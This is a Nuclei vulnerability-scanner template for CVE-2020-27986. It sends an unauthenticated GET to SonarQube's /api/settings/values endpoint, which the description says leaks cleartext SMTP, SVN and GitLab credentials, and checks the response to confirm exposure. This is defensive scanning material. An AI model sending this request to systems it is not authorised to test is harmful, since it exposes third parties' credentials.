nuclei-templates/cves/2020/CVE-2020-27986.yaml

29 lines
781 B
YAML

id: CVE-2020-27986
info:
name: SonarQube unauth
author: pikpikcu
severity: medium
description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
# Refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
requests:
- method: GET
path:
- "{{BaseURL}}/api/settings/values"
matchers-condition: and
matchers:
- type: word
words:
- "sonaranalyzer-cs.nuget.packageVersion"
- "sonar.core.id"
part: body
- type: status
status:
- 200